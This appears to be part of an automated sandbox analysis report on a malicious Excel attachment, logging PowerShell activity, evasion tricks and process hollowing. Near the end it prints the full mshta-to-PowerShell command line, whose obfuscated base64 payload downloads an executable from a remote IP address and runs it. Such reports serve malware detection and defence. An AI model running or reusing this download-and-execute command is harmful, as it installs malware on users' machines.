          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: PO 11001 .xlsStream path 'Workbook' entropy: 7.99942451923 (max. 8.0)
          Source: 54230000.0.drStream path 'Workbook' entropy: 7.99946274459 (max. 8.0)

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeAPI/Special instruction interceptor: Address: 4FA6CCD
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,34_2_0040DD85
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7144Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2813Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4738Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5120Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 729
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1131
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2503
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1006
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 766
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 414
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1665
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 922
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3214
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 711
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dllJump to dropped file
          Source: C:\Windows\System32\mshta.exe TID: 3944Thread sleep time: -420000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 7144 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 2813 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3136Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2076Thread sleep time: -360000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2432Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\mshta.exe TID: 724Thread sleep time: -480000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2592Thread sleep count: 729 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2096Thread sleep count: 1131 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1180Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2444Thread sleep time: -180000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2012Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 904Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1840Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 824Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 3928Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1932Thread sleep count: 1665 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1932Thread sleep count: 199 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep count: 922 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3060Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2108Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2592Thread sleep count: 3214 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep count: 711 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 3484Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_0040595A
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_00402862 FindFirstFileW,11_2_00402862
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040658F FindFirstFileW,FindClose,11_2_0040658F
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_0040595A
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_00402862 FindFirstFileW,23_2_00402862
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_0040658F FindFirstFileW,FindClose,23_2_0040658F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,33_2_0040595A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_00402862 FindFirstFileW,33_2_00402862
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0040658F FindFirstFileW,FindClose,33_2_0040658F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040AE51 FindFirstFileW,FindNextFileW,34_2_0040AE51
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,35_2_00407EF8
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,36_2_00407898
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00418981 memset,GetSystemInfo,34_2_00418981
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\tsdrjareurci
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_11-3878
          Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_11-3882
          Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_23-3800
          Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_23-3952
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,34_2_0040DD85
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,34_2_004044A4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Windows\System32\cmd.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection unmapped: C:\Windows\System32\cmd.exe base address: 400000
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 1940000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 18FFF4Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 1940000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 18FFF4
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"Jump to behavior
